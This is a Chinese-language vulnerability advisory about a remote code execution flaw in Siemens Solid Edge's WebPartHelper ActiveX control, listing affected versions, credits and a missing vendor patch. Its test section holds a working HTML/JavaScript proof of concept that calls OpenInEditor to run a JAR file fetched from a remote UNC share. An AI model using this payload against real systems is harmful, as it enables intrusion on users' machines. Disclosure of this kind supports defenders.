Siemens Solid Edge WebPartHelper ActiveX远程代码执行漏洞
发布日期:2013-05-26
更新日期:2013-05-28
受影响系统:Siemens Solid Edge ST5 105.x
Siemens SEListCtrlX ActiveX Control 105.x
Siemens WebPartHelper ActiveX Control 105.x
描述:
BUGTRAQ ID:
60158
SolidEdge是Siemens PLM Software公司旗下的三维CAD软件,采用Siemens PLM Software公司自己拥有专利的Parasolid作为软件核心,将普及型CAD系统与世界上最具领先地位的实体造型引擎结合在一起,是基于Windows平台、功能强大且易用的三维CAD软件。
Siemens Solid Edge WebPartHelper ActiveX控件内存在不安全的方法"OpenInEditor()" (WPHelper.dll),在实现上存在远程代码执行漏洞,成功利用此漏洞可使远程攻击者在受影响应用上下文中执行任意代码。
<*来源:rgod (
rgod@autistici.org)
链接:
http://secunia.com/advisories/53595/
http://retrogod.altervista.org/9sg_siemens_adv_i.htm
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!--
SIEMENS Solid Edge WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx
Remote Command Execution PoC
CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522}
Progid: SolidEdge.WebPartHelper.1
Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): False
Safe For Scripting (IObjectSafety): True
-->
<!-- saved from url=(0014)about:internet -->
<html>
<script>
var obj = new ActiveXObject("SolidEdge.WebPartHelper.1");
//launch calc.exe
//obj.OpenInEditor("c:\\windows\\system32\\calc.exe");
//bypass the confirmation box, JRE/JDK7u21
obj.OpenInEditor("\\\\192.168.0.1\\uncshare\\CmdExec.jar");
</script>
建议:
厂商补丁:
Siemens
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm浏览次数:4481
严重程度:0(网友投票)